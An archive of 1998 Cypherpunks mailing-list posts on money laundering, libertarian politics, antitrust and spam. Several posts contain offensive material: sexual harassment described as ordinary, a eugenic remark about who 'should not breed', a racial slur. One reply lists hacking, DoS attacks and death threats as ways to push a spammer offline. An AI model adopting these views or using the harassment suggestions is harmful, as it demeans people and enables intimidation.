anti-laundering law. [Turkey, a typical 3rd world pit, is too busy stealing
from its citizens via hyperinflation to bother with passing pro-looting 
legislation.] And it gave banks a warning abot dealing with Seychelles after
the government offered anyone placing $10m or more in certain investments 
immunity from prosecution [no STO there either]. The law containing this 
open invitation [more like comic relief] to crooked cash has since been 
shelved.

> E-Communist
> 25 St James's Street
> London SW1A 1HG
> www.economist.com


Fly low


S'n'S

Pro:__Money Laundering__Self Medication__Militia Grade Arms__Realism________
__Indirect Taxation___________Adults___________Individual Irrevocable Right$
} 	Smurf N Sniff		Non-Member, Gunfiscators of Canberra	   |
} 	P.O. Bunker 6669	"We don't want to be like those paranoid   |
} 	Hohoe, Ghana		Americans, this is a social DemoBracy."    |
} 	fn-fal@edict.gov.un	+233 55 1234	boycott GovernMedia NLC    |
ANTI:_feral guVermin____Vooters__________blue hellmutts______nihilists______
__biometric herd management__"(The) children"__state granted privilege_____!






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@REPLAY.COM>
Date: Sat, 10 Jan 1998 17:07:25 +0800
To: cypherpunks@Algebra.COM
Subject: Re: your mail
Message-ID: <199801100900.KAA11892@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



>On Thu, 8 Jan 1998 13:54:41 -0700 (MST) Graham-John Bullers
><real@freenet.edmonton.ab.ca> writes:
>>On Thu, 8 Jan 1998, Mix wrote:
>>
>>I think Vulis needs each of us to send ten copies of this back to him.
>
>I think so too what's his email address?????
>
>
>
>Anonymous304

Uh, you subscribe to the list but you can't find Vulis' address? Just how
stupid are you?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 10 Jan 1998 23:48:46 +0800
To: cypherpunks@toad.com
Subject: Re: your mail
In-Reply-To: <199801100900.KAA11892@basement.replay.com>
Message-ID: <LmJ4ie39w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain



Anonymous <nobody@REPLAY.COM> writes:

> >On Thu, 8 Jan 1998 13:54:41 -0700 (MST) Graham-John Bullers
> ><real@freenet.edmonton.ab.ca> writes:
> >>On Thu, 8 Jan 1998, Mix wrote:
> >>
> >>I think Vulis needs each of us to send ten copies of this back to him.
> >
> >I think so too what's his email address?????
> >
> >
> >
> >Anonymous304
>
> Uh, you subscribe to the list but you can't find Vulis' address? Just how
> stupid are you?

Guy Polis is indeed very stupid.  His former colleagues at J.P.Morgan
and Salomon bros, where he used to be a consultant, remember him as
a very stupid guy.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous304@juno.com (Anony J Man)
Date: Sat, 10 Jan 1998 23:13:13 +0800
To: m2cresumes@earthlink.net
Subject: REMOVE
Message-ID: <19980110.100047.3422.1.anonymous304@juno.com>
MIME-Version: 1.0
Content-Type: text/plain




On 9 Jan 1998 22:41:02 GMT m2cresumes@earthlink.net writes:
>NOT a job site, NOT a search engine, NOT a career board, NOT a 
>newsgroup
>AND we do NOT limit you to a single database!
>
>U S Resume is a true technological leap.  It allows subscribers access 
>the OVER 1 MILLION resumes on the ENTIRE INTERNET (source:  Electronic 
>Recruiting Index, Dec. 1996).  It finds your candidates and also 
>downloads their resumes to your hard drive all automatically, so you 
>can browse them later with NO Internet wait time.  You gain access to 
>the same "virtual robotics" technology used by our Fortune 500 
>clients, enabling you to spend less time looking for qualified 
>candidates and more time placing them.
>
>Prices start as low as $295 per month, no more than an ordinary job 
>board and less than just one typical help wanted display ad.
>
>Why not have the ENTIRE INTERNET as your own PERSONAL DATABASE?
>
>For additional information please visit us at http://www.usresume.com
>
>If the site doesn't answer all your questions, please don't hesitate 
>to call Dave Weltman or Jeff Eisenberg at 914-627-2600.
>
>Thanks!
>
>P.S If you would like to be added to our DO NOT EMAIL LIST, please 
>reply to this message with the word REMOVE in the Subject of your 
>reply.  When our Robot finds the word REMOVE in the Subject of any 
>message, it will automatically add the senders email address to our DO 
>NOT EMAIL LIST.
>
>
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 11 Jan 1998 01:08:10 +0800
To: cypherpunks@toad.com
Subject: Re: Freedom Forum report on the State of the First Amendment
In-Reply-To: <Pine.LNX.3.93.980111010436.141E-100000@shirley>
Message-ID: <4qm4ie46w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain



? the Platypus {aka David Formosa} <dformosa@st.nepean.uws.edu.au> writes:
> > Why there is even discussion on this point on a list whose membership is
> > composed mainly of market anarchists is beyond me,
>
> Since when has a crypto anarchist been a market anarchist?

You can't realy be one without the other. You can't be a little bit statist.
You can't be a little bit pregnant.

> > the NAP and rights of
> > association should clearly define the answer to this question, no
> > agression is involved in the act of firing or declining to hire people
> > based on their colour/nationality or any other factor whatsoever.
>
> Ok a for instence,  if I was your boss and I sated that I would fire you
> unless you would go *u-hum* cave exploring with me[1].  Such situations
> have occured in the past, would you support them.

If the sole owner of a business has a female secretary brought into his
office, pulls down his pants, and orders her to kiss his dick; and fires her
for refusing; then he's engaging in behavior that's been viewed for centuries
as one of the occupational hazards for working women and nothing out of the
ordinary. Of course if the "sexual harasser" happens to be governor bill
clinton, then he can do no wrong; if the boss himself works for a corporation
thrn we have an agency problem: she can complain to his boss, or the board of
directors, or the shareholders, that he's harming the business by firing a
valuable employee over his own sexual problems. If the secretary sues him in
the US, she might win some money, turn most of it over to her lawyers, and
never find another job; etc. Wouldn't it be easier to say that if you don't
like your present job for any reason (including your boss making amorous
advances, or too little pay, or the color of the paint on the walls of your
office), you should look for another one?

> To me a person with that amount of power is uneceptable.

You'd rather give his power to the employee or to the state? Don't forget
that this power is balanced by the employee's right to get up and leave.

Would you have preferred the model popular in the medieval europe, where
the boss was forced to care for the worker (peasant) if he got too old/sick to
work, but the worker/peasant couldn't get up and leave just because he felt
like it?  Apparently that involved the boss's right to fuck the peasant and
his family any time he pleased (ever heard of droit de segnor?)

> > the model is ethically right in that it allows businesses
> > and individuals to behave as they please as long as it harms no other
> > person,
>
> So allowing someone to stave to death because thay have the wrong collour
> of skin, or unwilling to get up close and personal with the boss, is not a
> form of harm.

Given the choice, some people indeed would rathe starve to death than work.
However all modern societies provide some sort of marxist safety net: those
who are too sick/old to work, or can't find work, or perhaps unilling to work
are given some of the wealth taken away by the state from those who have it
(mostly from those who do work).  This redistribution of wealth is another
contraversial issue, but it has very little connection to the question of
an employer's right to discrminate on criteria other than bona fide
occpuational qualifications.

Indeed, if all the employers in the world conspired not to hire redheads,
they still wouldn't starve; they'd get welfare (dole, whatever it's called
in ozland), and the more enterprising ones would start businesses of their
own and hire their fellow redheads. As US blacks once did that and were
in much better shape than they are now.

> Immagion there is a truck rolling out of conrol in your direction,
> keeping silent may harm you by preventing you from jumping out of the way,
> but this is not an agressive act, it is a passive one: I have declined to
> warn you.

The inaction that you've described is highly unethical, but hardly illegal.
Likewise racial discrimination is very unthical, and I'd generally try not to
deal with anyone who practices it, but it shouldn't be illegal.

> [1] Not that I am thay way enclined.

We know, you prefer kangaroos.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Sun, 11 Jan 1998 03:23:42 +0800
To: paul@fatmans.demon.co.uk>
Subject: Freedom, Starvation, and Uncoerced Relationships
In-Reply-To: <Pine.LNX.3.91.980104133448.1037A-100000@fatmans.demon.co.uk>
Message-ID: <v03102800b0dd76ca993a@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 6:17 AM -0800 1/10/98, ? the Platypus {aka David Formosa} wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>On Sun, 4 Jan 1998, Paul Bradley wrote:
>
>[...]
>
>> > My rights to swing my fists end at your noise.  When ever you interact
>> > with other peaple your rights are tempered by there rights.  Even Adam
>> > Smith recognised that its was gorverments dutie to redress the failing of
>> > the market.
>>
>> Why there is even discussion on this point on a list whose membership is
>> composed mainly of market anarchists is beyond me,
>
>Since when has a crypto anarchist been a market anarchist?

And how else could it be?


>> the NAP and rights of
>> association should clearly define the answer to this question, no
>> agression is involved in the act of firing or declining to hire people
>> based on their colour/nationality or any other factor whatsoever.
>
>Ok a for instence,  if I was your boss and I sated that I would fire you
>unless you would go *u-hum* cave exploring with me[1].  Such situations
>have occured in the past, would you support them.

Employees and employers make agreements all the time. To wear funny
uniforms, to bark when the boss says bark, to write in certain languages,
and so on.

If an employee does not wish to do what an employer instructs, he or she
may leave.

Sounds fair to me.

(And most employers will value work output--profits--over lesser
considerations. So, even though a boss has every "right" to demand that
employees where dunce caps to work, for example, few will. Those who do
will lose their employees and go out of business. Sounds fair to me.)



>So allowing someone to stave to death because thay have the wrong collour
>of skin, or unwilling to get up close and personal with the boss, is not a
>form of harm.

I "allow people to starve to death" each and every day because they are not
doing something I want. Think about it. Every time I elect not to send
money to starving Bengalis or Hutus or Ugabugus I am "allowing them to
starve," quite literally.

So?

If an employer chooses not to hire certain types of persons this is really
no different from my choosing not to marry certain types of persons (and I
can imagine I could save a woman from "starving" by simply flying to Bangla
Desh, finding a starving woman, marrying her, and then supporting her. So?).

These are well-covered issues in many books on libertarianism and freedom.

Freedom means freedom. That some people will not have as much food as they
would like to have in a free society is no reason to discard freedom.

More to the point, crypto anarchy means taking such decisions about whether
to discard freedom or not out of the hands of others.

--Tim May

The Feds have shown their hand: they want a ban on domestic cryptography
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^2,976,221   | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sun, 11 Jan 1998 03:41:52 +0800
To: cypherpunks@cyberpass.net
Subject: The name "Crypto Kong"
Message-ID: <199801101918.LAA06148@proxy4.ba.best.com>
MIME-Version: 1.0
Content-Type: text/plain



    --
I have received some negative feedback about the name 
"Crypto Kong".

Two people have complained that it is unprofessional 
sounding. 

This is not necessarily grounds for alarm.  One reason the 
name irritates people is that it sticks in the mind like a 
bad song, which was of course an important reason for 
choosing it.   No one is likely to  say "Hey, I saw this plug 
for some digital signing tool, but I can't remember the
name."

On the other hand ...

What do you think?


    --digsig
         James A. Donald
     6YeGpsZR+nOTh/cGwvITnSR3TdzclVpR0+pr3YYQdkG
     dOmrVP48CpP0XXqoK97INGkIpJVWXfGzg3ZO/DO5
     40BWwXgdXOaD0gGym/BpRFmyDIg3eYHNBgULka9Ix
 ---------------------------------------------------------------------
We have the right to defend ourselves and our property, because of 
the kind of animals that we are. True law derives from this right, 
not from the arbitrary power of the state.

http://www.jim.com/jamesd/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 11 Jan 1998 01:07:28 +0800
To: cypherpunks@toad.com
Subject: Re: [Humor] Kennedy's New Legislation
In-Reply-To: <Pine.LNX.3.93.980111012555.141H-100000@shirley>
Message-ID: <eio4ie47w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain



? the Platypus {aka David Formosa} <dformosa@st.nepean.uws.edu.au> writes:

> On Thu, 8 Jan 1998, Dr.Dimitri Vulis KOTM wrote:
>
> > Mark Rogaski <wendigo@ne-wendigo.jabberwock.org> writes:
> >
> > > An entity claiming to be Bill Stewart wrote:
> [...]
> > > : It's only evolution in action if it gets them before they've reproduced
> > > :
> > >
> > > Actually, natural selection in action ...
> >
> > Same thing...
>
> There is a diffrence.  It is only evoltion if there is a combernation of
> natural verence and natural selection.  If you have a population of
> unchanging clones (your typical 'master race') you don't get any evoltion
> or improvement.

In case of homo sapiens, it is the same thing.  Assholes like the Kennedys
kill themselves though drugs and reckless skiing before they have a chance
to breed (or breed more). One of the reasons why all drugs should be legal
is that people who should not breed will use the drugs to kill themselves,
leaving more room/wealth/resources for their genetic superiors.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Sun, 11 Jan 1998 03:54:52 +0800
To: John Young <cypherpunks@cyberpass.net
Subject: Re: Theory Behind USA v. Microsoft
In-Reply-To: <1.5.4.32.19980110191251.0101e398@pop.pipeline.com>
Message-ID: <v03102801b0dd7c58e771@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 11:12 AM -0800 1/10/98, John Young wrote:
>John Cassidy writes in the January 12 New Yorker mag
>of the controversial economic theory which undergirds DoJ's
>antitrust action against Microsoft.
>
>He cites a seminal 1984 paper by Brian Arthur, "Competing
>Technologies and Lock-in by Historical Small Events: The
>Dynamics of Choice Under Increasing Returns."

I've followed Brian Arthur's work for a decade or so, and find much in it
that seems quite accurate.

One of his main observations is that size _does_ matter, that larger
economic agents often tend to get larger. There are various plausible
reasons for this, but it does seem to match reality.

(I'm avoiding jumping to conclusions that Brian Arthur is anti-capitalist
or any such thing. Just discussing reality as it is.)

We see this in the "Intel-Cisco-Sun-Microsoft-Oracle" universe, where each
of these players has about an 80% or better market share in its respective
niche.

Now Brian Arthur doesn't claim that such dominant market shares will last
indefinitely--the dominant companies in 1900 are mostly no longer even in
existence in any recognizable form, and even the dominant companies in 1950
have mostly been completely replaced by "upstarts."

But size does matter, bringing economies of scale, the ability to set and
enforce standards, and the ability to withstand competitive onslaughts for
longer times (than smaller, less financially solid, companies).

>After years of disparagement the theory seems to have
>caught on, at least at Justice and with others who oppose the
>theory of free market determination of winners and losers.
>Arthur argues that market dominance by inferior products
>is possible, and cites MS-DOS as an example.

Sure, there are many, many "non-optimal" products. Much of society is
non-optimal, even in the infrastructure. Roads don't go where they
"should," the wrong kind of electrical sockets were adopted, and so on, for
examples I don't need to spend time listing.

A way of viewing this is of _inertia_ or _sticking friction_. Once certain
standars have been set, it is just not possible to roll back history and
proceed down another path.

For example, it might well be that the world would have been better off
using the Motorola 68000 family in places where the Intel x86 dominated
(for possibly accidental, local reasons, as anyone who has read the history
of IBM's adoption of the x86 knows). And ditto for adoption of a better OS
than MS-DOS was (same accidental decision).

But we are not in that world, and the installed base of PCs and x86 systems
and MS-DOS or Windows systems is so large that it is simply impossible to
"jump tracks."

Now eventually things will change. Some new paradigm will come along.

There is no guarantee that in 2025 the dominant players today will still be
dominant.

Let's not forget that two years ago many were saying Microsoft would be
wiped out by the advent of "Web browsers as operating systems and office
suites," with Netscape Navigator being the Swiss army knife of programs.
Recall that analysts were sagely predicting that Bill Gates had "missed
out" on the Internet.

Now we have the spectacle of Netscape demanding that the government give it
back its dominant Web position! (Maybe then the University of Illinois can
get the DOJ to sue Netscape to take away Netscape's dominant position!)


>
>Arthur is now a scientist at the Santa Fe Institute. He says
>his theory "stands a great deal of economics on its head."
>One critic said to Arthur, "If you are right, capitalism can't
>work."

Which is nonsense. All Brian Arthur has done is to analyze some of the
"physics of markets" (my name).

Schumpeter said much the same thing when he talked about the "creative
destructionism" of capitalism.


--Tim May

The Feds have shown their hand: they want a ban on domestic cryptography
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^2,976,221   | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Sheriff <sheriff@speakeasy.org>
Date: Sun, 11 Jan 1998 02:00:14 +0800
To: cypherpunks@toad.com
Subject: Spam
Message-ID: <l03020901b0dd558f496e@[209.130.131.105]>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

I've got a question for y'all.

Some idiot finally sent me a junk e-mail message that
I couldn't do anything about with what I have the 
knowledge to do -- reading the headers turned up only
one ISP, which was apparently owned by the spammer.

I'm hoping you guys would know where I could find out
more about this individual -- I'm hoping that he does
in fact buy his service from someone else, and if so,
I'm not sure how to find that out.  If he doesn't, is
there anything I can do?


-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 5.0 for non-commercial use <http://www.pgp.com>
Charset: noconv

iQEVAwUBNLenyABMw4+NR29ZAQHvrgf+NnvFR55ExZrzp2m/XDT5MisT2rem4Hct
/okK9HV/DkZJzCsklbqjOrJkEHg96txCPyQ+DKBWatP5ywoaw4O47Tn8udiuDNwI
7DGiFcbYtG5fFHKYzDxM3KWtXbIDn1bliFF80xSoYzYdJKqxCkYPtuaDjasr1EIG
iYC9Sm+BQoeFb2n0ptxwB8PsK7Pi5nlf5DCXsIMGrQmcm6GqhgkzC3aNPqNucka4
lyY0YjLnx9WC2JDRrg0Xji1zffC5MiZJrf/1ne9HXylEubWXHh49UdCeAXwyzmDS
5vW7FY2XeQL2OcPOKRVU26eiqnyCxxkx/tLi3yq4yRDt/MfIDHBOuQ==
=5oGu
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Sun, 11 Jan 1998 02:44:17 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Freedom Forum report on the State of the First Amendment (fwd)
Message-ID: <199801101908.NAA14049@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Sat, 10 Jan 1998 13:32:31 -0500 (EST)
> From: Jon Galt <jongalt@everest.pinn.net>
> Subject: Re: Freedom Forum report on the State of the First Amendment
> 
> On 23 Dec 1997, Colin Rafferty wrote:
> 
> > Oppression is done by a society.  It can only be stopped by acting
> > against the individuals in the society that are doing the oppressing.
> 
> Well make up your mind!  Is it done "by a society" or by "individuals"???

Actualy it's both, societies, their beliefs and actions, are individuals
acting in concert. The relationship is identical to that of a tree in a 
forest.


    ____________________________________________________________________
   |                                                                    |
   |      Those who make peaceful revolution impossible will make       |
   |      violent revolution inevitable.                                |
   |                                                                    |
   |                                          John F. Kennedy           |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Galt <jongalt@everest.pinn.net>
Date: Sun, 11 Jan 1998 02:40:57 +0800
To: Colin Rafferty <craffert@ml.com>
Subject: Re: Freedom Forum report on the State of the First Amendment
In-Reply-To: <ocru3bz3lrh.fsf@ml.com>
Message-ID: <Pine.SUN.3.91.980110133036.9530B-100000@everest.pinn.net>
MIME-Version: 1.0
Content-Type: text/plain



On 23 Dec 1997, Colin Rafferty wrote:

> Oppression is done by a society.  It can only be stopped by acting
> against the individuals in the society that are doing the oppressing.

Well make up your mind!  Is it done "by a society" or by "individuals"???

______________________________________________________________________
Jon Galt
e-mail:  jongalt@pinn.net
website:  http://www.pinn.net/~jongalt/
PGP public key available on my website.
Democracy is two wolves and a sheep voting on what to have for dinner.
______________________________________________________________________





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Uhh...this is Joe [Randall Farmer]" <rfarmer@HiWAAY.net>
Date: Sun, 11 Jan 1998 04:15:22 +0800
To: The Sheriff <sheriff@speakeasy.org>
Subject: Re: Spam
In-Reply-To: <l03020901b0dd558f496e@[209.130.131.105]>
Message-ID: <Pine.OSF.3.96.980110132804.16414A-100000@fly.HiWAAY.net>
MIME-Version: 1.0
Content-Type: text/plain



> I've got a question for y'all.
> 
> Some idiot finally sent me a junk e-mail message that I couldn't do anything
> about with what I have the knowledge to do -- reading the headers turned up
> only one ISP, which was apparently owned by the spammer. 

Well, if it's used only for spam, get it on some block lists.

> 
> I'm hoping you guys would know where I could find out more about this
> individual -- I'm hoping that he does in fact buy his service from someone
> else, and if so, I'm not sure how to find that out. 

Well, it's pretty easy to harass or otherwise push someone off of the Net (I
guess that's why we've got Eternity servers and anonymous remailers)...do a
traceroute and an Internic whois. This will reveal his/her/its/their upstream
provider (a hop or two before the end of the traceroute or as a contact on the
whois results), among other things.

> If he doesn't, is there anything I can do?

Well, although I don't think this would be warranted for anything short of an
emergency, you could try a more direct DoS attack by hacking, death threats, or
DoS Politics, or you could try to get more powerful entities than yourself
pissed off at the spammer. Like I said, though, I don't think it's wise to
start a Scientology-esque netwar whenever an ISP turns you a deaf ear. Can't
imagine being a remailer operator trying to defend against all this, though...

---------------------------------------------------------------------------
Randall Farmer
    rfarmer@hiwaay.net
    http://hiwaay.net/~rfarmer





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Sun, 11 Jan 1998 03:43:19 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Freedom, Starvation, and Uncoerced Relationships (fwd)
Message-ID: <199801102007.OAA14257@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Sat, 10 Jan 1998 11:15:42 -0800
> From: Tim May <tcmay@got.net>
> Subject: Freedom, Starvation, and Uncoerced Relationships

> >Since when has a crypto anarchist been a market anarchist?
> 
> And how else could it be?

Easily. The acceptance of freedom of speech is not equivalent to the
acceptance to spend and earn money freely and without regulation.

Speech and money are *not* equivalent.

This is as specious as Vulis' argument that these positions are equivalent
to pregnancy in the logical realm, in short you are or aren't. The reality
is that few people, other than statists or extremists look at the world let
alone their personal beliefs in that simplistic fashion.

I believe in the unregulated exercise of speech, including the dissemination
and use of crypto technology. To do otherwise implies some sort of ownership
of the individual by the society doing the regulating. Clearly an incorrect
conclusion. The ability of those same groups to spend their money as they
see fit is not supportable by that same logic. Groups must have regulated
monetary systems or else they collapse because of the monopolization and
therefore loss of vitality of markets. To believe otherwise is to accept the
premise that these monopolies could somehow buy an individuals rights.
Clearly a result even a market anarchist can't accept.


    ____________________________________________________________________
   |                                                                    |
   |      Those who make peaceful revolution impossible will make       |
   |      violent revolution inevitable.                                |
   |                                                                    |
   |                                          John F. Kennedy           |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Sun, 11 Jan 1998 03:46:36 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: The name "Crypto Kong" (fwd)
Message-ID: <199801102011.OAA14307@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Sat, 10 Jan 1998 11:18:17 -0800 (PST)
> From: "James A. Donald" <jamesd@echeque.com>
> Subject: The name "Crypto Kong"

> I have received some negative feedback about the name 
> "Crypto Kong".
> 
> Two people have complained that it is unprofessional 
> sounding. 

Two people? That's it?

> This is not necessarily grounds for alarm.  One reason the 
> name irritates people is that it sticks in the mind like a 
> bad song, which was of course an important reason for 
> choosing it.   No one is likely to  say "Hey, I saw this plug 
> for some digital signing tool, but I can't remember the
> name."

When I think of it I think of 'Donkey Kong'.

> What do you think?

Unless the loss would result in ten's of thousands of dollars of income
leave it. If it would effect a large sales market it under a more acceptable
name to the business community. Nothing unethical about selling the same
product under two different names...


    ____________________________________________________________________
   |                                                                    |
   |      Those who make peaceful revolution impossible will make       |
   |      violent revolution inevitable.                                |
   |                                                                    |
   |                                          John F. Kennedy           |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 11 Jan 1998 03:15:06 +0800
To: cypherpunks@cyberpass.net
Subject: Theory Behind USA v. Microsoft
Message-ID: <1.5.4.32.19980110191251.0101e398@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



John Cassidy writes in the January 12 New Yorker mag
of the controversial economic theory which undergirds DoJ's 
antitrust action against Microsoft.

He cites a seminal 1984 paper by Brian Arthur, "Competing
Technologies and Lock-in by Historical Small Events: The
Dynamics of Choice Under Increasing Returns."

After years of disparagement the theory seems to have
caught on, at least at Justice and with others who oppose the
theory of free market determination of winners and losers.
Arthur argues that market dominance by inferior products
is possible, and cites MS-DOS as an example.

Arthur is now a scientist at the Santa Fe Institute. He says
his theory "stands a great deal of economics on its head."
One critic said to Arthur, "If you are right, capitalism can't
work."

For those unable to get the magazine, we offer a copy of
Cassidy's essay:

   http://jya.com/arthur.htm (33K)

A side note: the same issue has a short piece noting that
the early charges of militant conspiracy behind the OKC
bombing have disappeared from the trials of McVeigh and
Nichols, and proposes that an apology is due militants, 
militia and other paranoiac targets.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sat, 10 Jan 1998 21:35:27 +0800
To: cypherpunks@Algebra.COM
Subject: Surprise - Anonymous Journalist Opposes Laundering [2/4]
Message-ID: <199801101328.OAA07071@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



	Part 2 "Journalistic Secrecy is a Serious Problem" [2/4]

				[2/4]
Taken to the cleaners

["]Un["]fortunately, some of this is not as encouraging as it sounds. For a 
start, the ["]dirty["] money leaving banks may end up polluting other 
businesses [MONEY LAUNDERING IS GOOD FOR BUSINESS]. PoLice in Texas
say that foreign-exchange bureaux there have been a primary conduit for
channelling drug money to and from Mexico. Insurers are also vulnerable. One
recent laundering wheeze involves buying single-premium insurance policies
with ["]dirty["] money. These are then cashed in early in return for a 
"clean" cheque from the insurer, or used as collateral for a bank loan.
[On the way: Currency Transaction Reports for purchase of insurance policies
with cash and Early Redemption Reports for policies held less than 50 years.
Insurance agents will be required to report "suspicious" policy holders and
report possible "structuring" violations. Then they'll wonder why customers
are "shunning" insurance companies.] Even the rising cost of laundering may
not be unalloyed good news. It may simply reflect the emergence of a new 
group of professional launderers who are better at beating the system, and
charge more for doing so. [Or as Comrade Clinton would put it, "getting 
their fair share"] Some poLiceman fear that these experts may soon be using
electronic-cash systems to speed up the wash cycle (see box on next page).
[See post 4/4]

Worse [Better], as old laundering centres close their doors, new ones are 
opening theirs. The table above [shown below this paragraph] shows the 
countries that the State Department thinks face a severe money-laundering 
problem. (Even states with tough anti-laundering rules, such as America and 
Britain, are listed if their vigilance is considered essential in the
global fight against laundering.) The striking thing about the ranking is 
that it includes islands such as Cyprus, a ["]hive["] of offshore activity
for the Russian mafia, and Aruba, a Dutch dependency in the Caribbean, which
were not associated with laundering a few years ago. [Translation: Aruba
et. al. have always been on their shit list, and now that they've taken out 
the higher-priority targets e.g. CH and Cayman, the NWO _Microchip Extremists_
are setting their sights on shutting down the lower-yield peripheral sites.
(which they've "only just recently discovered" are pro-privacy areas)]
Another notable inclusion is Mexico, which the report describes as "the
money-laundering haven of choice for initial placement of US currency in the
world's financial system". In March, the [criminal] Mexican government 
unveiled a series of anti-laundering [fig leaf] measures in a belated effort
to clean up its reputation.

Laundry list
"High-priority" laundering centres,
March 1997
			A	B	C	D
Aruba			yes	.	.	yes
Canada			yes	yes	yes	yes
Cayman Islands		yes	yes	.	yes
Colombia		yes	.	.	yes
Cyprus			yes	na	yes	yes
[Doesn't indicate differences between Greek and Turkish regs, if any.]
Germany			yes	.	.	yes
Hong Kong		yes	yes	.	yes
Italy			yes	yes	yes	yes
Mexico			yes	.	yes	.
Netherlands		yes	yes	yes	yes
Netherlands Antilles	yes	.	.	yes
Nigeria			yes	.	.	na
Panama			.	.	yes	yes
Russia			.	.	.	.
Singapore		yes	.	yes	yes
Thailand		.	.	.	.
Turkey			.	.	.	.
Britain			yes	yes	yes	yes
United States		yes	yes	yes	yes
Venezuela		yes	.	yes	yes

A Banks required (or permitted) to report suspicious transactions.
[Communese translation: entry-level bank tellers required (or permitted) to
make subjective determinations as to customers' intent and/or state of mind.
Required (or permitted) to report people encountered on city streets who
may be shunning banks in favor of foreign-exchange houses and cheque-cashing
outlets. Development of mind-reading skills mandated by executive order.]

B Government permits sharing of seized assets with other governments that 
assisted the underlying investigation.
[Communese translation: Thieves drawing paycheques from extorted proceeds 
allowed to share stolen goods with accomplices in other jurisdictions.
The Legislator/B-Crat/Snitch/Judge motto: "We Know Em When We Seize Um"]

C Non-banks must meet same anti-laundering provisions as banks.
[Communese translation: The woman with an appearance approximating the 
Wicked Witch of the West sitting behind the .357 Magnum resistant 
